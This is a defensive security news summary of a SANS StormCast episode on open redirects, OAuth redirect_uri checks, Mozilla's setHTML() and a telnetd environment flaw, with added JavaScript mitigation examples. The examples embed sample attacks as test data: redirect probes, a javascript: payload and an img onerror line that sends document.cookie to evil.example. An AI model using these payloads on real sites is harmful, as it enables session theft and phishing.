
SANS Internet StormCast
Open redirects and unsafe HTML insertion remain common web weaknesses: the first lends a trusted domain to a phishing link or steers an OAuth authorization code to a host the attacker controls, the second leads straight to DOM-based cross-site scripting. Both have well-documented mitigations that developers still skip. The telnetd environment-variable flaw shows that legacy services can still carry high-impact bugs, so wherever they remain in service they need strict configuration and prompt patching.
The latest StormCast episode highlights a sharp rise in open-redirect probes observed across the SANS honeypot fleet. Attackers are scanning for redirect parameters (the typical next= or url= after login) that are not validated against the application's own origin. The same weakness can be weaponized during OAuth 2.0 authorization flows: if the authorization server matches redirect_uri loosely (by prefix or by host), an open redirect on the client's domain forwards the authorization code to the attacker. Open redirects dropped out of the OWASP Top 10 after the 2013 edition (where they were A10, Unvalidated Redirects and Forwards), but the OWASP cheat sheet on the topic still offers concrete mitigation steps, and the episode advises blocking traffic from known bullet-proof hosting IP ranges that often shelter these campaigns.
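The two checks that close this class of bug, as an added example rather than code from the episode or the ISC diary: a same-origin check for a post-login "next" parameter, and the OAuth redirect_uri comparison in its weak (prefix) and correct (exact) form. It assumes Node.js 18 or later for the global WHATWG URL parser; the application origin, the client's registered callback and the probe strings are constructed for illustration.

```javascript
// Added example for this summary; not code from the StormCast episode or the
// ISC diary. Assumes Node.js 18+ (global WHATWG URL). The origin, client URIs
// and probe strings below are constructed for illustration.

const SITE_ORIGIN = "https://example.com"; // hypothetical application origin

// Post-login "next" parameter: resolve it against our own origin and accept it
// only if the result still lives on that origin. Returning path+query+hash
// instead of the absolute URL means the caller can never emit a foreign or
// protocol-relative Location header by mistake.
function safeLocalRedirect(raw, origin = SITE_ORIGIN) {
  let target;
  try {
    // The WHATWG parser turns "//evil.example/x" and "/\\evil.example/x" into
    // absolute URLs with host evil.example, so both fail the origin check.
    target = new URL(raw, origin);
  } catch {
    return null; // unparseable: caller falls back to a fixed landing page
  }
  // origin covers scheme, host and port; "javascript:" yields the opaque
  // origin "null", which never matches.
  if (target.origin !== new URL(origin).origin) return null;
  return target.pathname + target.search + target.hash;
}

// Registered redirect URIs for a hypothetical OAuth client.
const REGISTERED_REDIRECT_URIS = ["https://client.example/oauth/callback"];

// Weak setting: prefix match. Anything under the registered path, including a
// ".." segment that walks to an open redirect on the same host, is accepted,
// and the authorization code travels with it.
function weakPrefixRedirectUriCheck(candidate, registered = REGISTERED_REDIRECT_URIS) {
  return registered.some((r) => candidate.startsWith(r));
}

// Corrected setting: exact string comparison, as RFC 6749 section 3.1.2.2 and
// the OAuth 2.0 Security BCP require. No normalisation, prefix or wildcard.
function exactRedirectUriCheck(candidate, registered = REGISTERED_REDIRECT_URIS) {
  return registered.includes(candidate);
}

// Constructed probe strings of the kind an open-redirect scanner sends.
const PROBES = [
  "/account?tab=security",
  "https://example.com/account",
  "//evil.example/phish",
  "/\\evil.example/phish",
  "https://example.com@evil.example/",
  "https://example.com.evil.example/",
  "javascript:alert(document.domain)",
];

// Map each probe to the accepted local path, or null when it is rejected.
function classifyProbes(probes = PROBES) {
  const out = {};
  for (const p of probes) out[p] = safeLocalRedirect(p);
  return out;
}

if (typeof require !== "undefined" && require.main === module) {
  console.table(classifyProbes());
  const hostile =
    "https://client.example/oauth/callback/../../redirect?to=https://evil.example/";
  console.log("prefix match accepts hostile redirect_uri:", weakPrefixRedirectUriCheck(hostile));
  console.log("exact match accepts hostile redirect_uri:", exactRedirectUriCheck(hostile));
}
```

Only the first two probes survive: a local path and an absolute URL that already points at the site's own origin. The user-info trick, the look-alike subdomain, the backslash and protocol-relative forms, and the javascript: scheme all resolve to a different origin and are rejected by the same comparison, which is why an origin check is preferable to pattern matching on the raw string.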
Mozilla's new setHTML() method, part of the Sanitizer API, is presented as a practical defense against DOM-based cross-site scripting. It parses untrusted HTML and drops the script-capable parts (script elements, event-handler attributes) before insertion, occupying the middle ground between innerHTML, which executes whatever it is handed, and innerText, which renders the markup as literal text. A sanitizer configuration lets developers specify exact allow-lists of elements and attributes, and the method is designed to be used alongside Trusted Types. The episode notes support in Firefox (from version 148) and Chrome; Safari adoption is what remains for a cross-browser XSS mitigation baseline.
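How the three sinks compare on one hostile comment, as an added example that is not code from the Mozilla post. Element.setHTML() is a browser API (Firefox 148 onward per the post), so running this file stand-alone under Node exercises only the fallback branch; the comment markup, the allow-list and the renderComment helper are constructed for illustration.

```javascript
// Added example illustrating setHTML(); not code from the Mozilla post.
// Element.setHTML() exists in browsers only, so a stand-alone run under Node
// takes the fallback branch. Markup and allow-list below are constructed.

// Constructed attacker-controlled input: harmless formatting plus two
// payloads, an event-handler attribute and a script element.
const UNTRUSTED_COMMENT =
  '<p>Nice post, <b>really</b>.</p>' +
  '<img src="x" onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">' +
  '<script>alert(document.domain)</script>';

// Allow-list for a comment body: elements and attributes not named here are
// removed. URL-bearing attributes (href, src) are deliberately left out so no
// scheme check is needed on our side.
const COMMENT_SANITIZER = {
  elements: ["p", "br", "b", "i", "em", "strong", "code", "ul", "ol", "li"],
  attributes: ["title"],
};

// Insert untrusted markup into `target`.
//   target.innerHTML = html            -> the img onerror runs: DOM XSS
//   target.textContent = html          -> safe, but tags show as literal text
//   target.setHTML(html, { sanitizer }) -> keeps <p>/<b>, drops onerror and <script>
// Returns the sink that was used so the caller can log or test the decision.
function renderComment(target, html, sanitizer = COMMENT_SANITIZER) {
  if (typeof target.setHTML === "function") {
    // Safe variant: script elements and event handlers are stripped even if a
    // config tried to allow them; only setHTMLUnsafe() would honour that.
    target.setHTML(html, { sanitizer });
    return "setHTML";
  }
  // Sanitizer API absent (older browsers, Node): degrade to text-only,
  // never to innerHTML.
  target.textContent = html;
  return "textContent";
}

// In a page: renderComment(document.getElementById("comment-1"), UNTRUSTED_COMMENT);
```

The point of returning the sink name is operational: a site migrating from innerHTML can log which branch its users hit and confirm, once Safari ships the API, that the text-only fallback has stopped firing.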
A second vulnerability discussed involves telnetd's handling of client-supplied environment variables. An attacker who can set a crafted variable, such as the credentials directory path, may gain arbitrary file creation and ultimately log in as any user, including root. The recommended fix is a strict allow-list of benign variables (e.g., LANG, LC_*), dropping everything else, rather than a block-list that has to be extended each time another dangerous variable turns up. The episode underscores the ongoing risk of legacy services and the need for proactive configuration hardening.
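The block-list and allow-list approaches side by side, as an added example that is not the telnetd patch and does not reproduce the reported flaw. It assumes the daemon has already decoded the client's name/value pairs into an object; the variable names, the value pattern and the sample offer are constructed for illustration.

```javascript
// Added example of the allow-list strategy described above; not the telnetd
// fix and not a reproduction of the flaw. Assumes client-offered environment
// variables arrive as a plain {name: value} object. Sample data is constructed.

// Weak setting: enumerate what is known to be dangerous and pass the rest.
// Any name missing from the list reaches the login process untouched.
const BLOCKED_NAMES = ["LD_PRELOAD", "LD_LIBRARY_PATH"]; // illustrative and necessarily incomplete

function blockListFilter(offered) {
  const kept = {};
  for (const [name, value] of Object.entries(offered)) {
    if (!BLOCKED_NAMES.includes(name)) kept[name] = value;
  }
  return kept;
}

// Corrected setting: name an exact set of benign variables (LANG and LC_*),
// constrain their values to what a locale name can contain, and drop
// everything else. A newly discovered dangerous variable needs no list update.
const ALLOWED_NAME = /^(LANG|LC_[A-Z]+)$/;
const LOCALE_VALUE = /^[A-Za-z0-9_.@-]{1,64}$/; // e.g. en_US.UTF-8, C, de_DE@euro

function allowListFilter(offered) {
  const kept = {};
  for (const [name, value] of Object.entries(offered)) {
    if (ALLOWED_NAME.test(name) && LOCALE_VALUE.test(value)) kept[name] = value;
  }
  return kept;
}

// Constructed client offer: two legitimate locale settings, one allow-listed
// name carrying a path instead of a locale, one loader variable, and one
// made-up name that appears on no block list.
const OFFERED_ENV = {
  LANG: "en_US.UTF-8",
  LC_ALL: "C",
  LC_TIME: "../../../tmp/evil",
  LD_PRELOAD: "/tmp/x.so",
  SOMETHING_NOBODY_LISTED: "/tmp/attacker-controlled",
};

if (typeof require !== "undefined" && require.main === module) {
  console.log("block-list keeps:", Object.keys(blockListFilter(OFFERED_ENV)));
  console.log("allow-list keeps:", Object.keys(allowListFilter(OFFERED_ENV)));
}
```

The block list removes the two names it knows about and lets the unlisted one through; the allow list keeps exactly LANG and LC_ALL, rejecting LC_TIME because a path is not a locale name. Checking the value as well as the name matters: an allow-listed name with an attacker-shaped value is still attacker input.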
Open Redirects: A Forgotten Vulnerability?
https://isc.sans.edu/diary/Open%20Redirects%3A%20A%20Forgotten%20Vulnerability%3F/32742
https://hacks.mozilla.org/2026/02/goodbye-innerhtml-hello-sethtml-stronger-xss-protection-in-firefox-148/
https://seclists.org/oss-sec/2026/q1/199